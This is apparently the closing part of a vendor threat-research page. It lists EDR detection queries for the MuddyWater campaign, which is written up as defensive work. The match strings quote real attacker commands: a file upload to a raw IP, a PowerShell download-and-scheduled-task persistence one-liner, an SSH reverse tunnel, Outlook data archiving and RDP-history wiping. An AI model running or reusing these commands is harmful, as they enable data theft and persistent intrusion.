    technologygroup = "EDR" and commandline like "powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand [REDACTED]"

    Detection Query 96:

    technologygroup = "EDR" and commandline like "$wc = New-Object System.Net.WebClient;" and commandline like "$wc.UploadFile http://143.198.5.41:443/success" and commandline like "%PUBLIC%\downloads\cobe-notes.txt;%"

    Detection Query 97:

    technologygroup = "EDR" and commandline like "taskkill /IM novaservice.exe"

    Detection Query 98:

    technologygroup = "EDR" and commandline like "%Start-Process %ALLUSERSPROFILE%\FMAPP.exe -WindowStyle Hidden%"

    Detection Query 99:

    technologygroup = "EDR" and commandline like "%PROGRAMFILES%\Microsoft Office\Office16\WINWORD.EXE%"

    Detection Query 100:

    technologygroup = "EDR" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "%/c %ALLUSERSPROFILE%\CertificationKit.ini%"

    Detection Query 101:

    technologygroup = "EDR" and commandline like "%TNC <%> -Port 135%"

    Detection Query 102:

    technologygroup = "EDR" and commandline like ".\SOCKSSrv.exe"

    Detection Query 103:

    technologygroup = "EDR" and (commandline like "netstat -nao" or commandline like "findstr 28443")

    Detection Query 104:

    technologygroup = "EDR" and commandline like "%Enter-PSSession -ComputerName <%>%"

    Detection Query 105:

    technologygroup = "EDR" and commandline like "%TNC <%> -Port 389%"

    Detection Query 106:

    technologygroup = "EDR" and (commandline like "netstat -nao" or commandline like "findstr 443")

    Detection Query 107:

    technologygroup = "EDR" and commandline like "netsh i p re all"

    Detection Query 108:

    technologygroup = "EDR" and commandline like ".\443.exe"

    Detection Query 109:

    technologygroup = "EDR" and commandline like "%WINDIR%\System32\drivers\conhost.exe -f conhost.dll -ER --ln --path cmd.exe%"

    Detection Query 110:

    technologygroup = "EDR" and (commandline like "cmd.exe /C systeminfo" or commandline like "findstr /I")

    Detection Query 111:

    technologygroup = "EDR" and commandline like "%PROGRAMFILES%\WinRAR\RAR.exe%" and commandline like "a -v1000m -m5" and commandline like "%PROGRAMFILES%\WinRAR\%.rar%" and commandline like "%C:/Users/%/AppData/Local/Microsoft/Outlook/%"

    Detection Query 112:

    technologygroup = "EDR" and commandline like "net user DC-01$ P@ssw0rd"

    Detection Query 113:

    technologygroup = "EDR" and commandline like "%WINDIR%\system32\openssh\ssh.exe[%]@[%] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070%"

    Detection Query 114:

    technologygroup = "EDR" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" and commandline like "/va /f"

    Detection Query 115:

    technologygroup = "EDR" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" and commandline like "/f"

    Detection Query 116:

    technologygroup = "EDR" and commandline like "SCCM.exe reconfig /target:[REDACTED]"

    Detection Query 117:

    technologygroup = "EDR" and commandline like "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Renovation -Value" and commandline like "cmd /c \"

    Detection Query 118:

    technologygroup = "EDR" and commandline like "$path=$di+\WinWebex.exe;Add-Type -A System.Net.Http;$c=New-Object System.Net.Http.HttpClient; $c.DefaultRequestHeaders.UserAgent.ParseAdd(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0);[IO.File]::WriteAllBytes($path, $c.GetAsync(https://meetingapp.site/webexdownload).Result.Content.ReadAsByteArrayAsync().Result); $c.Dispose();Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force; Start-ScheduledTask -TaskName winWebex;exit;"

    Detection Query 119:

    resourcename = "Unix" and commandline like "uname -v > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 120:

    resourcename = "Unix" and commandline like "hostname > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 121:

    resourcename = "Unix" and commandline like "whoami > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 122:

    resourcename = "Unix" and commandline like "+%Z > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 123:

    resourcename = "Unix" and commandline like "uname -r > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 124:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "ssh 104.238.191.185 -P 443"

    Detection Query 125:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "netsh i p a v listenport=443 connecthost=127.0.0.1 connectport=28443"

    Detection Query 126:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443"

    Detection Query 127:

    technologygroup = "EDR" and commandline like "uname -v > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 128:

    technologygroup = "EDR" and commandline like "hostname > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 129:

    technologygroup = "EDR" and commandline like "whoami > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 130:

    technologygroup = "EDR" and commandline like "+%Z > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 131:

    technologygroup = "EDR" and commandline like "uname -r > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 132:

    technologygroup = "EDR" and commandline like "ssh 104.238.191.185 -P 443"

    Detection Query 133:

    technologygroup = "EDR" and commandline like "netsh i p a v listenport=443 connecthost=127.0.0.1 connectport=28443"

    Detection Query 134:

    technologygroup = "EDR" and commandline like "netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443"

    Reference:     

    https://www.trellix.com/blogs/research/the-iranian-cyber-capability-2026/


    Tags

    MalwareThreat ActorIranMuddyWaterAPTUnited StatesIsrael

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2026 by Gurucul - All rights reserved.